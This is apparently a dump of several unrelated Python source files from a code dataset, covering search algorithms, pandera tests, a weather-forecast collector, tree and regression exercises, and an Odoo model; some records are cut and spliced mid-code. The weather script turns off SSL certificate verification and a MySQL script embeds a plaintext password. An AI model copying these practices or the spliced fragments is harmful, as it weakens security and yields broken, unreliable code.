binary search\n# O(log n) time algorithm for finding a target in a sorted array.\n#\n# Returns a 0-based index if found, None if not\n#\nimport math\n\n\ndef binarySearch(a, target):\n    n = len(a)\n    lo = 0\n    hi = n - 1\n\n    while lo <= hi:\n        mid = (lo + hi) // 2\n        if target == a[mid]:\n            return mid\n        if target < a[mid]:\n            hi = mid - 1\n        else:\n            lo = mid + 1\n    return None\n\n\n# bisect\n# Find the largest t such that f(t) < 0, assuming f is increasing\n#\ndef bisect(f):\n    # grow a finite upper bound first by doubling\n    hi = 1.0\n    while f(hi) < 0:\n        hi *= 2\n    lo = 0.0\n    while hi - lo > 1e-9:\n        mid = (lo + hi) / 2\n        if f(mid) > 0:\n            hi = mid\n        else:\n            lo = mid\n    return lo\n","sub_path":"Activities/debugging/debug1.py","file_name":"debug1.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"97793220","text":"\"\"\"Tests schema creation and validation from type annotations.\"\"\"\n# pylint:disable=missing-class-docstring,missing-function-docstring,too-few-public-methods\nimport re\nfrom typing import Iterable, Optional\n\nimport pandas as pd\nimport pytest\n\nimport pandera as pa\nfrom pandera.typing import Index, Series\n\n\ndef test_to_schema():\n    \"\"\"Test that SchemaModel.to_schema() can produce the correct schema.\"\"\"\n\n    class Schema(pa.SchemaModel):\n        a: Series[int]\n        b: Series[str]\n        idx: Index[str]\n\n    expected = pa.DataFrameSchema(\n        columns={\"a\": pa.Column(int), \"b\": pa.Column(str)},\n        index=pa.Index(str),\n    )\n\n    assert expected == Schema.to_schema()\n\n    with pytest.raises(TypeError):\n        Schema()\n\n\ndef 
test_invalid_annotations():\n \"\"\"Test that SchemaModel.to_schema() fails if annotations or types are not\n recognized.\n \"\"\"\n\n class Missing(pa.SchemaModel):\n a = pa.Field()\n b: Series[int]\n c = pa.Field()\n _d = 0\n\n err_msg = re.escape(\"Found missing annotations: ['a', 'c']\")\n with pytest.raises(pa.errors.SchemaInitError, match=err_msg):\n Missing.to_schema()\n\n class Invalid(pa.SchemaModel):\n a: int\n\n with pytest.raises(pa.errors.SchemaInitError, match=\"Invalid annotation\"):\n Invalid.to_schema()\n\n from decimal import Decimal # pylint:disable=C0415\n\n class InvalidDtype(pa.SchemaModel):\n d: Series[Decimal] # type: ignore\n\n with pytest.raises(\n TypeError, match=\"python type '\"\n ):\n InvalidDtype.to_schema()\n\n\ndef test_optional_column():\n \"\"\"Test that optional columns are not required.\"\"\"\n\n class Schema(pa.SchemaModel):\n a: Optional[Series[str]]\n b: Optional[Series[str]] = pa.Field(eq=\"b\")\n\n schema = Schema.to_schema()\n assert not schema.columns[\"a\"].required\n assert not schema.columns[\"b\"].required\n\n\ndef test_optional_index():\n \"\"\"Test that optional indices are not required.\"\"\"\n\n class Schema(pa.SchemaModel):\n idx: Optional[Index[str]]\n\n with pytest.raises(\n pa.errors.SchemaInitError, match=\"Index 'idx' cannot be Optional.\"\n ):\n Schema.to_schema()\n\n\ndef test_schemamodel_with_fields():\n \"\"\"Test that Fields are translated in the schema.\"\"\"\n\n class Schema(pa.SchemaModel):\n a: Series[int] = pa.Field(eq=9, ne=0)\n b: Series[str]\n idx: Index[str] = pa.Field(str_length={\"min_value\": 1})\n\n actual = Schema.to_schema()\n expected = pa.DataFrameSchema(\n columns={\n \"a\": pa.Column(\n int, checks=[pa.Check.equal_to(9), pa.Check.not_equal_to(0)]\n ),\n \"b\": pa.Column(str),\n },\n index=pa.Index(str, pa.Check.str_length(1)),\n )\n\n assert actual == expected\n\n\ndef test_invalid_field():\n class Schema(pa.SchemaModel):\n a: Series[int] = 0\n\n with pytest.raises(\n pa.errors.SchemaInitError, match=\"'a' can only be assigned a 'Field'\"\n ):\n Schema.to_schema()\n\n\ndef test_multiindex():\n \"\"\"Test that multiple Index annotations create a MultiIndex.\"\"\"\n\n class Schema(pa.SchemaModel):\n a: Index[int] = pa.Field(gt=0)\n b: Index[str]\n\n expected = pa.DataFrameSchema(\n index=pa.MultiIndex(\n [\n pa.Index(int, name=\"a\", checks=pa.Check.gt(0)),\n pa.Index(str, name=\"b\"),\n ]\n )\n )\n assert expected == Schema.to_schema()\n\n\ndef test_check_validate_method():\n \"\"\"Test validate method on valid data.\"\"\"\n\n class Schema(pa.SchemaModel):\n a: Series[int]\n\n @pa.check(\"a\")\n def int_column_lt_100(cls, series: pd.Series) -> Iterable[bool]:\n # pylint:disable=no-self-argument\n assert cls is Schema\n return series < 100\n\n df = pd.DataFrame({\"a\": [99]})\n assert isinstance(Schema.validate(df, lazy=True), pd.DataFrame)\n\n\ndef test_check_single_column():\n \"\"\"Test the behaviour of a check on a single column.\"\"\"\n\n class Schema(pa.SchemaModel):\n a: Series[int]\n\n @pa.check(\"a\")\n def int_column_lt_100(cls, series: pd.Series) -> Iterable[bool]:\n # pylint:disable=no-self-argument\n assert cls is Schema\n return series < 100\n\n df = pd.DataFrame({\"a\": [101]})\n schema = Schema.to_schema()\n err_msg = r\"Column\\s*a\\s*int_column_lt_100\\s*\\[101\\]\\s*1\"\n with pytest.raises(pa.errors.SchemaErrors, match=err_msg):\n schema.validate(df, lazy=True)\n\n\ndef test_check_single_index():\n \"\"\"Test the behaviour of a check on a single index.\"\"\"\n\n class 
Schema(pa.SchemaModel):\n a: Index[str]\n\n @pa.check(\"a\")\n def not_dog(cls, idx: pd.Index) -> Iterable[bool]:\n # pylint:disable=no-self-argument\n assert cls is Schema\n return ~idx.str.contains(\"dog\")\n\n df = pd.DataFrame(index=[\"cat\", \"dog\"])\n err_msg = r\"Index\\s*\\s*not_dog\\s*\\[dog\\]\\s*\"\n with pytest.raises(pa.errors.SchemaErrors, match=err_msg):\n Schema.validate(df, lazy=True)\n\n\ndef test_field_and_check():\n \"\"\"Test the combination of a field and a check on the same column.\"\"\"\n\n class Schema(pa.SchemaModel):\n a: Series[int] = pa.Field(eq=1)\n\n @pa.check(\"a\")\n @classmethod\n def int_column_lt_100(cls, series: pd.Series) -> Iterable[bool]:\n return series < 100\n\n schema = Schema.to_schema()\n assert len(schema.columns[\"a\"].checks) == 2\n\n\ndef test_check_non_existing():\n \"\"\"Test a check on a non-existing column.\"\"\"\n\n class Schema(pa.SchemaModel):\n a: Series[int]\n\n @pa.check(\"nope\")\n @classmethod\n def int_column_lt_100(cls, series: pd.Series) -> Iterable[bool]:\n return series < 100\n\n err_msg = (\n \"Check int_column_lt_100 is assigned to a non-existing field 'nope'\"\n )\n with pytest.raises(pa.errors.SchemaInitError, match=err_msg):\n Schema.to_schema()\n\n\ndef test_multiple_checks():\n \"\"\"Test multiple checks on the same column.\"\"\"\n\n class Schema(pa.SchemaModel):\n a: Series[int]\n\n @pa.check(\"a\")\n @classmethod\n def int_column_lt_100(cls, series: pd.Series) -> Iterable[bool]:\n return series < 100\n\n @pa.check(\"a\")\n @classmethod\n def int_column_gt_0(cls, series: pd.Series) -> Iterable[bool]:\n return series > 0\n\n schema = Schema.to_schema()\n assert len(schema.columns[\"a\"].checks) == 2\n\n df = pd.DataFrame({\"a\": [0]})\n err_msg = r\"Column\\s*a\\s*int_column_gt_0\\s*\\[0\\]\\s*1\"\n with pytest.raises(pa.errors.SchemaErrors, match=err_msg):\n schema.validate(df, lazy=True)\n\n df = pd.DataFrame({\"a\": [101]})\n err_msg = r\"Column\\s*a\\s*int_column_lt_100\\s*\\[101\\]\\s*1\"\n with pytest.raises(pa.errors.SchemaErrors, match=err_msg):\n schema.validate(df, lazy=True)\n\n\ndef test_check_multiple_columns():\n \"\"\"Test a single check decorator targeting multiple columns.\"\"\"\n\n class Schema(pa.SchemaModel):\n a: Series[int]\n b: Series[int]\n\n @pa.check(\"a\", \"b\")\n @classmethod\n def int_column_lt_100(cls, series: pd.Series) -> Iterable[bool]:\n return series < 100\n\n df = pd.DataFrame({\"a\": [101], \"b\": [200]})\n with pytest.raises(\n pa.errors.SchemaErrors, match=\"2 schema errors were found\"\n ):\n Schema.validate(df, lazy=True)\n\n\ndef test_check_regex():\n \"\"\"Test the regex argument of the check decorator.\"\"\"\n\n class Schema(pa.SchemaModel):\n a: Series[int]\n abc: Series[int]\n cba: Series[int]\n\n @pa.check(\"^a\", regex=True)\n @classmethod\n def int_column_lt_100(cls, series: pd.Series) -> Iterable[bool]:\n return series < 100\n\n df = pd.DataFrame({\"a\": [101], \"abc\": [1], \"cba\": [200]})\n with pytest.raises(\n pa.errors.SchemaErrors, match=\"1 schema errors were found\"\n ):\n Schema.validate(df, lazy=True)\n\n\ndef test_inherit_schemamodel_fields():\n \"\"\"Test that columns and indices are inherited.\"\"\"\n\n class Base(pa.SchemaModel):\n a: Series[int]\n idx: Index[str]\n\n class Mid(Base):\n b: Series[str]\n idx: Index[str]\n\n class Child(Mid):\n b: Series[int]\n\n expected = pa.DataFrameSchema(\n columns={\"a\": pa.Column(int), \"b\": pa.Column(int)},\n index=pa.Index(str),\n )\n\n assert expected == Child.to_schema()\n\n\ndef 
test_inherit_field_checks():\n \"\"\"Test that checks are inherited and overridden.\"\"\"\n\n class Base(pa.SchemaModel):\n a: Series[int]\n abc: Series[int]\n\n @pa.check(\"^a\", regex=True)\n @classmethod\n def a_max(cls, series: pd.Series) -> Iterable[bool]:\n return series < 100\n\n @pa.check(\"a\")\n @classmethod\n def a_min(cls, series: pd.Series) -> Iterable[bool]:\n return series > 1\n\n class Child(Base):\n @pa.check(\"a\")\n @classmethod\n def a_max(cls, series: pd.Series) -> Iterable[bool]:\n return series < 10\n\n schema = Child.to_schema()\n assert len(schema.columns[\"a\"].checks) == 2\n assert len(schema.columns[\"abc\"].checks) == 0\n\n df = pd.DataFrame({\"a\": [15], \"abc\": [100]})\n err_msg = r\"Column\\s*a\\s*a_max\\s*\\[15\\]\\s*1\"\n with pytest.raises(pa.errors.SchemaErrors, match=err_msg):\n schema.validate(df, lazy=True)\n\n\ndef test_dataframe_check():\n \"\"\"Test dataframe checks.\"\"\"\n\n class Base(pa.SchemaModel):\n a: Series[int]\n b: Series[int]\n\n @pa.dataframe_check\n @classmethod\n def value_max(cls, df: pd.DataFrame) -> Iterable[bool]:\n return df < 200\n\n class Child(Base):\n @pa.dataframe_check()\n @classmethod\n def value_min(cls, df: pd.DataFrame) -> Iterable[bool]:\n return df > 0\n\n @pa.dataframe_check\n @classmethod\n def value_max(cls, df: pd.DataFrame) -> Iterable[bool]:\n return df < 100\n\n schema = Child.to_schema()\n assert len(schema.checks) == 2\n\n df = pd.DataFrame({\"a\": [101, 1], \"b\": [1, 0]})\n with pytest.raises(\n pa.errors.SchemaErrors, match=\"2 schema errors were found\"\n ):\n schema.validate(df, lazy=True)\n\n\ndef test_config():\n \"\"\"Test that Config can be inherited and translate into DataFrameSchema options.\"\"\"\n\n class Base(pa.SchemaModel):\n a: Series[int]\n idx_1: Index[str]\n idx_2: Index[str]\n\n class Config:\n name = \"Base schema\"\n coerce = True\n multiindex_coerce = True\n multiindex_strict = True\n multiindex_name: Optional[str] = \"mi\"\n\n class Child(Base):\n b: Series[int]\n\n class Config:\n name = \"Child schema\"\n strict = True\n multiindex_strict = False\n\n expected = pa.DataFrameSchema(\n columns={\"a\": pa.Column(int), \"b\": pa.Column(int)},\n index=pa.MultiIndex(\n [pa.Index(str, name=\"idx_1\"), pa.Index(str, name=\"idx_2\")],\n coerce=True,\n strict=False,\n name=\"mi\",\n ),\n name=\"Child schema\",\n coerce=True,\n strict=True,\n )\n\n assert expected == Child.to_schema()\n","sub_path":"tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":11215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"183057992","text":"class RingBuffer:\n def __init__(self, capacity):\n self.capacity = capacity\n self.current = 0\n self.storage = [None]*capacity\n\n def append(self, item):\n # Set the passed in item to evaluate to the current item in storage.\n self.storage[self.current] = item\n # If the current value is less than the overall capacity.\n if self.current < self.capacity - 1:\n # Add it to the list\n self.current += 1\n else:\n # Otherwise set current value to 0\n self.current = 0\n\n def get(self):\n list = []\n for value in self.storage:\n if value is not None:\n list.append(value)\n return list","sub_path":"ring_buffer/ring_buffer.py","file_name":"ring_buffer.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"390242481","text":"from urllib import request\nfrom datetime import datetime, date\nimport 
sys\nimport json\nimport ssl\nssl._create_default_https_context = ssl._create_unverified_context\n\n###################\n# 2020 thisispoki #\n###################\n# Did I get called by Telegraf, or am I testing?\nif len(sys.argv) == 4:\n cityid = str(sys.argv[1])\n units = str(sys.argv[2])\n appid = str(sys.argv[3])\nelse:\n cityid = '5391959'\n units = 'metric'\n appid = ''\n\n# This function sets the common tags for each line we'll be generating\n# There's a case for lat and lon to be values rather than tags, but it's unclear as to the relative importance of\n# InfluxDB v1.x GROUP BY or Flux geo functions. \ndef getCoreFields(jsonContent, city):\n return ','.join(['weather',\n 'city=' + city,\n 'lat=' + str(jsonContent['lat']),\n 'lon=' + str(jsonContent['lon']),\n 'timezone=' + str(jsonContent['timezone']),\n 'timezone_offset=' + str(jsonContent['timezone_offset']) + 'i'])\n\n# Each line will have a set of common fields\ndef getRepeatedFields(jsonContent):\n return ','.join(['temp=' + str(jsonContent['temp']),\n 'feels_like=' + str(jsonContent['feels_like']),\n 'pressure=' + str(jsonContent['pressure']) + 'i',\n 'humidity=' + str(jsonContent['humidity']) + 'i',\n 'dew_point=' + str(jsonContent['dew_point']),\n 'clouds=' + str(jsonContent['clouds']) + 'i',\n 'wind_speed=' + str(jsonContent['wind_speed']),\n 'wind_deg=' + str(jsonContent['wind_deg']) + 'i',\n 'description=\"' + jsonContent['weather'][0]['description'] + '\"'])\n\n# Date mathematics, to determine the local HH:mm:ss given an epoch timestamp and a timezone offset\ndef getTimeFromDateTimeOffset(rawTime, offset):\n timeEpoch = rawTime + offset\n timeObject = datetime.fromtimestamp(timeEpoch)\n return str(timeObject.hour).zfill(2) + ':' + str(timeObject.minute).zfill(2) + ':' + str(timeObject.second).zfill(2)\n\n################\n# Start of doing things. Start with a call to get the lon, lat & city from the cityid\n################\nthisurl = 'https://api.openweathermap.org/data/2.5/weather?id=' + cityid + '&appid=' + appid\ncontents = request.urlopen(thisurl).read()\njsonContent = json.loads(contents)\nlat = str(jsonContent['coord']['lat'])\nlon = str(jsonContent['coord']['lon'])\ncity = str(jsonContent['name'])\n\n################\n# Now we've built all the URL parameters we'll need, let's make the actual call\n################\ncontents = request.urlopen(\"https://api.openweathermap.org/data/2.5/onecall?lat=\" + lat + \"&lon=\" + lon + \"&exclude=minutely&units=\" + units + \"&appid=\" + appid).read()\njsonContent = json.loads(contents)\n\n# Start building the output. 
Note that city is a tag, and it might have special characters, so quote them\ncoreoutput = getCoreFields(jsonContent, city.replace(' ', '\\ ').replace(',','\\,'))\n\n#current weather variables\ntimezone_offset = jsonContent['timezone_offset']\ntimestamp = jsonContent['current']['dt'] * 1000000000\nsunrise = getTimeFromDateTimeOffset(jsonContent['current']['sunrise'], timezone_offset)\nsunset = getTimeFromDateTimeOffset(jsonContent['current']['sunset'], timezone_offset)\ntoday = date.fromtimestamp(jsonContent['current']['sunrise'] + timezone_offset)\n\ncurrentLineProtocol = getRepeatedFields(jsonContent['current'])\n\n# Construct the rest of the line protocol for the current weather.\n# The trailing space in 'forecast=0h ' ends the tag section, so today/sunrise/sunset/uvi below are written as fields.\noutput = ','.join([coreoutput,\n                   'forecast=0h '\n                   'today=\"' + str(today) + '\"',\n                   'sunrise=\"' + sunrise + '\"',\n                   'sunset=\"' + sunset + '\"',\n                   'uvi=' + str(jsonContent['current']['uvi']),\n                   currentLineProtocol + ' ' + str(timestamp)])\n\n# Store the whole line into a list so it can be quickly extracted\noutputlist = [output]\n\n# Loop around all 48 hours of hourly forecasts, joining the fields with the core data we captured earlier\nhourNumber=1\nfor hourly in jsonContent['hourly']:\n    #hourly forecast\n    output = ','.join([coreoutput,\n                       'forecast=' + str(hourNumber) + 'h ' + getRepeatedFields(hourly) + ' ' + str(hourly['dt'] * 1000000000)])\n    outputlist.append(output)\n    hourNumber += 1\n\n# Loop around all 8 days of daily forecasts, joining the fields with the core data we captured earlier\ndayNumber=0\nfor daily in jsonContent['daily']:\n    #Daily forecast\n    timestamp = daily['dt'] * 1000000000\n    sunrise = getTimeFromDateTimeOffset(daily['sunrise'], timezone_offset)\n    sunset = getTimeFromDateTimeOffset(daily['sunset'], timezone_offset)\n    today = date.fromtimestamp(daily['sunrise'] + timezone_offset)\n\n    # temp and feels_like are JSON objects, containing day, morn, eve, max, night, min, etc.\n    # for now, let's just use the 'day' temperatures\n    daily['temp'] = daily['temp']['day']\n    daily['feels_like'] = daily['feels_like']['day']\n    # unlike the current-weather line above, these values come before the space in 'forecast=Nd ',\n    # so today/sunrise/sunset/uvi end up in the tag section here rather than as fields\n    output = ','.join([coreoutput,\n                       'today=' + str(today),\n                       'sunrise=' + sunrise,\n                       'sunset=' + sunset,\n                       'uvi=' + str(daily['uvi']),\n                       'forecast=' + str(dayNumber) + 'd ' + getRepeatedFields(daily) + ' ' + str(daily['dt'] * 1000000000)])\n    outputlist.append(output)\n    dayNumber += 1\n\n# Quickly output all the stored lines\nfinalOutput = '\\n'.join(outputlist)\nprint(finalOutput)","sub_path":"local_weather_forecast/onecall.py","file_name":"onecall.py","file_ext":"py","file_size_in_byte":5347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"104189712","text":"class TreeNode(object):\n    def __init__(self, x):\n        self.val = x\n        self.left = None\n        self.right = None\n\nroot = TreeNode(3)\n\np = root.left = TreeNode(5)\nroot.left.left = TreeNode(6)\nroot.left.right = TreeNode(2)\n\nq = root.right = TreeNode(1)\nroot.right.left = TreeNode(0)\nroot.right.right = TreeNode(8)\n\nclass Solution:\n    def lowestCommonAncestor(self, root, p, q):\n        _stack = []\n        recent_popped = None\n        _stack_p, _stack_q = [], []\n        while root or _stack:\n            while root:\n                _stack.append(root)\n                root = root.left\n            cur = _stack[-1]\n            if cur.right == None: # can be popped immediately: the right child is None, so there is no right subtree and this node can be emitted now\n                if cur == p:\n                    _stack_p = _stack[:]\n                if cur == q:\n                    _stack_q = _stack[:]\n                recent_popped = _stack.pop(-1)\n                root = None # make the next iteration continue from the stack\n            elif cur.right == recent_popped: # or the right child was just popped, so this node can be emitted too\n                if cur == p:\n                    _stack_p = _stack[:]\n                if cur == q:\n                    _stack_q = 
_stack[:]\n                recent_popped = _stack.pop(-1)\n                root = None\n            elif cur.right != recent_popped: # cur.right and cur.right != recent_popped: # the right child is not empty and not yet visited, so this node cannot be emitted yet\n                root = cur.right # go on to traverse the right subtree\n\n        ans = None\n        while _stack_p and _stack_q: # pop both stacks together until the first differing element\n            if _stack_p[0] != _stack_q[0]: # the paths diverge here, so there is no common node beyond this point\n                break\n            p = _stack_p.pop(0) # remember the element popped this round\n            q = _stack_q.pop(0)\n            ans = p\n        return ans\n\n\n    def lowestCommonAncestor1(self, root, p, q):\n        queue = [root]\n        parent = {root:None} # parent maps each node to its parent\n        while p not in parent or q not in parent: # keep going until both p and q have their parents recorded\n            cur = queue.pop()\n            if cur.left:\n                parent[cur.left] = cur\n                queue.append(cur.left)\n            if cur.right:\n                parent[cur.right] = cur\n                queue.append(cur.right)\n\n        ancestors = set()\n        while p:\n            ancestors.add(p) # add p and each of its ancestors to the set\n            p = parent[p]\n        while q not in ancestors: # walk up from q until a node already in the set is found; that node is the lowest common ancestor\n            q = parent[q]\n        return q # if q itself is in the set, q is the common node\nprint(Solution().lowestCommonAncestor(root,p,q))","sub_path":"二叉树/236. 二叉树的最近公共祖先.py","file_name":"236. 二叉树的最近公共祖先.py","file_ext":"py","file_size_in_byte":2881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"332605976","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 2 15:46:52 2019\n\n@author: Mikko\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 25 17:02:44 2019\n\n@author: Mikko\n\n     ## DONE! ##\n\"\"\"\n\nimport sklearn.linear_model\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.feature_selection import RFECV\nfrom scipy.io import loadmat\nfrom sklearn.metrics import accuracy_score\n\n#X_train, y_train, X_test, y_test = loa\n\nmat = loadmat(\"arcene.mat\")\nX_train = mat[\"X_train\"]\ny_train = mat[\"y_train\"].ravel()\nX_test = mat[\"X_test\"]\ny_test = mat[\"y_test\"].ravel()\n\n\nsolver = sklearn.linear_model.LogisticRegression(solver=\"liblinear\")\nslc = RFECV(estimator=solver, step=50, verbose=1)\nslc.fit(X_train,y_train)\nprint(\"Selected Features\",np.sum(slc.support_))\n\nprint(\"Optimal number of features : %d\" % slc.n_features_)\n\n\ny_hat = slc.predict(X_test)\naccuracy = accuracy_score(y_test, y_hat)\n\nprint(\"Accuracy is \",accuracy*100,\"%\")\n\n\n# Plot number of features VS. 
cross-validation scores\nplt.figure()\nplt.xlabel(\"Number of features selected\")\nplt.ylabel(\"Cross validation score (nb of correct classifications)\")\nplt.plot(range(1, len(slc.grid_scores_) + 1), slc.grid_scores_)\nplt.show()\n","sub_path":"exercises/Ex6/EX6_4.py","file_name":"EX6_4.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"486106179","text":"import time\r\nimport sys\r\nimport os\r\n\r\ncwd = os.getcwd()\r\n\r\nfrom mouseAutomater import ImageController\r\nfrom mouseAutomater import MouseAutomater\r\n\r\nlsleep = 0.002\r\nrsleep = 0.025\r\nprint(\"Created by HudZah\\n\\n\\n\")\r\n\r\nimageName = ImageController.getImage()\r\nhandler = ImageController(imageName)\r\nresizeValue = int(input(\"Output pixel size (for square image): \"))\r\noffset = int(input(\"Scale for image (1 for one to one): \"))\r\nresizeValue = resizeValue / offset\r\nhandler.convertToBW()\r\nhandler.resize(resizeValue)\r\n\r\nreturnKey = None\r\nwhile returnKey is None:\r\n    MouseAutomater.openPaint()\r\n    print(\"Warning: There is no fail-safe other than pulling your mouse to the upper left corner, in case anything goes wrong once you start this program please abort using Ctrl + Alt + Delete \\n\\n\\n\")\r\n    print(\"Enter to start 3 second countdown, N to abort, pull to left hand corner to abort once the program starts\")\r\n    print(\"Please position your cursor on a canvas on either Paint, Photoshop or any other design software as soon as you start running this. Make sure there is optimal space to completely draw the image.\")\r\n    returnKey = input()\r\n    returnKey = returnKey.lower()\r\n    if returnKey == \"n\":\r\n        exit()\r\n    \r\ntime.sleep(3)\r\narray = handler.newImageArray()\r\nMouseAutomater.imageToLines(array, offset, rsleep, lsleep)\r\nrepeat = \"y\"\r\nwhile repeat == \"y\":\r\n    repeat = input(\"Type 'y' to repeat, or enter to exit\")\r\n    repeat = repeat.lower()\r\n    if repeat == \"y\":\r\n        time.sleep(3)\r\n        MouseAutomater.imageToLines(array, offset, rsleep, lsleep)\r\n    else:\r\n        exit()\r\n\r\n","sub_path":"AutoDrawer/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"315411666","text":"# data loading and basic preprocessing\nimport pandas as pd\nimport numpy as np\nfrom sklearn import linear_model\nfrom sklearn.model_selection import cross_val_score,KFold,GridSearchCV\nfrom sklearn import metrics\n\n# read in the data\ndf = pd.read_csv(\"FE_day_T.csv\")\n#print(df.head())\n\n# split features and target\ny = df['cnt']\nX = df.drop('cnt', axis = 1)\n\nrcv = linear_model.RidgeCV(alphas=np.array([0.01, 0.1, 1, 10, 100]))\n\nresult = {}\nk = []\ndef ridge_score(X,y):\n    X = X.values\n    y = y.values\n\n    # K-fold cross-validation split\n    fold = KFold(5, shuffle=False) # split into 5 folds\n    i = 0\n    for train_index, test_index in fold.split(X, y):\n        X_train, X_test = X[train_index], X[test_index]\n        y_train, y_test = y[train_index], y[test_index]\n\n        rcv.fit(X_train, y_train)\n        y_pred = rcv.predict(X_test)\n\n        result[i] = rcv.coef_\n        k.append(metrics.mean_squared_error(y_test, y_pred))\n        print(\"MSE:{0}\".format(metrics.mean_squared_error(y_test, y_pred)))\n        i = i + 1\n\n\nridge_score(X, y)\nprint(result[k.index(min(k))])\n","sub_path":"LinearRegression/Ridge.py","file_name":"Ridge.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"240896624","text":"import pymysql\nimport 
csv\nimport pandas as pd\n\n# connect to the database\ndb = pymysql.connect(host='127.0.0.1', port=3306, user='chiouchingyi', passwd='850121', db='tracks')\ncursor = db.cursor()\nprint(\"Opened database successfully\")\n\nuser_id = 'nicole'\nnum = 20\n\nfinal_L = []\n\ndata_folder = \"csv/results/\"\nfilepath = data_folder + user_id+ '.csv'\nprint('路徑:',filepath)\n\ngetrecresult = \"select score from tracks_recfromrlresults where user_id='{}' and number_of_rec_times='{}'\".format(user_id,num)\ndata1 = cursor.execute(getrecresult)\n##print(data1) # returns 0 or 1: 1 means data was found, 0 means no data or failure\nrs1 = cursor.fetchall()\n##print(rs1)\n\nif int(num) > 1:\n    action = 'a'\nelse:\n    action = 'w'\n\nwith open(filepath, action, newline='') as csvfile:\n    writer = csv.writer(csvfile)\n    if num == 1:\n        writer.writerow(['user_id','number_of_rec_times','s1','s2','s3','s4','s5','s6','s7','s8','s9','s10','s11','s12','s13','s14','s15','s16','s17','s18','s19','s20','avg_score'])\n    L = []\n    for row in rs1:\n        result = row[0]\n        L.append(int(result))\n    print(num)\n    print(L)\n    avg_score = sum(L)/len(L) \n    print('ID:',user_id,' | ','AVG score:',avg_score)\n\n    Table = [[user_id,num,L[0],L[1],L[2],L[3],L[4],L[5],L[6],L[7],L[8],L[9],L[10],L[11],L[12],L[13],L[14],L[15],L[16],L[17],L[18],L[19],avg_score]]\n    writer.writerows(Table)\n","sub_path":"RL/getRLRecScore.py","file_name":"getRLRecScore.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"207098833","text":"#! python3\n\n\nimport sys\nimport os\nimport csv\nfrom collections import defaultdict\n# ^dict subclass that calls a factory function to insert 0 for missing values\nimport pandas as pd\n\n\n# =============================================================================\n# START SELECTION GROUP (1)\n# =============================================================================\n\n\ndef file_name():\n    while True:\n        global fileName  # = 0):\n            squares.append((i + 2, j - 1))\n        if (i - 2 >= 0) & (j + 1 < m):\n            squares.append((i - 2, j + 1))\n        if (i - 2 >= 0) & (j - 1 >= 0):\n            squares.append((i - 2, j - 1))\n        if (i + 1 < n) & (j - 2 >= 0):\n            squares.append((i + 1, j - 2))\n        if (i - 1 >= 0) & (j + 2 < m):\n            squares.append((i - 1, j + 2))\n        if (i - 1 >= 0) & (j - 2 >= 0):\n            squares.append((i - 1, j - 2))\n    return squares\n\n\n# Recursively searches for a complete tour from a given square\ndef find_route(square, visited, n, m):\n    if len(visited) == n * m:\n        return True\n    for next in next_square(square, n, m):\n        if next not in visited:\n            if find_route(next, visited + [next], n, m):\n                return True\n    return False\n\n\n# Checks if a tour is possible from any square of an nxm board\ndef is_tour(n, m):\n    for i in range(n):\n        for j in range(m):\n            square = (i, j)\n            visited = [square]\n            if find_route(square, visited, n, m):\n                return True\n    return False\n","sub_path":"recursive_tour.py","file_name":"recursive_tour.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"89906458","text":"# -*- coding:utf-8 -*-\nfrom __future__ import print_function\nimport os\nimport platform\n\n__ENV_KEYS = ['PATH', 'PYTHONPATH', 'PKG_CONFIG_PATH', 'LD_LIBRARY_PATH']\n\ndef is_windows():\n    return platform.system() == \"Windows\"\n    \n    \ndef is_linux():\n    return platform.system() == \"Linux\"\n    \n    \ndef env_sep():\n    return ':' if not is_windows() else ';'\n    \n    \ndef get_env_dict():\n    envs = os.environ\n    print(envs)\n    d = {}\n    sep = env_sep()\n    for 
key in __ENV_KEYS:\n        if key not in envs:\n            continue\n        value = envs[key]\n        strs = value.split(sep)\n        # filter invalid\n        valids = []\n        for s in strs:\n            s = s.strip()\n            if len(s) > 0:\n                valids.append(s)\n        d[key] = valids\n    return d\n    \n    \ndef print_env_dict(envs):\n    for k in envs.keys():\n        v = envs[k]\n        print('%s\\t\\t%d' % (k, len(v)))\n        for s in v:\n            print('\\t%s'% (s))\n\n\nif __name__ == '__main__':\n    envs = get_env_dict()\n    print_env_dict(envs)\n    \n","sub_path":"digits/envs.py","file_name":"envs.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"445564333","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\n\nclass journal_entries_employee(models.Model):\n    _name = \"account.move\"\n    _inherit = \"account.move\"\n\n    \n    @api.multi\n    @api.depends('line_ids.employee_id')\n    def _compute_employee_id(self):\n        for move in self:\n            employee = move.line_ids.mapped('employee_id')\n            move.employee_id = employee.id if len(employee) == 1 else False\n\n\n    employee_id = fields.Many2one('hr.employee', compute='_compute_employee_id', string=\"Employee\", store=True, readonly=True)\n\nclass journal_entries_employee_line(models.Model):\n    _name = \"account.move.line\"\n    _inherit = \"account.move.line\"\n\n    employee_id = fields.Many2one('hr.employee', string='Employee', ondelete='restrict')\n\n    @api.multi\n    @api.onchange('employee_id','partner_id')\n    def 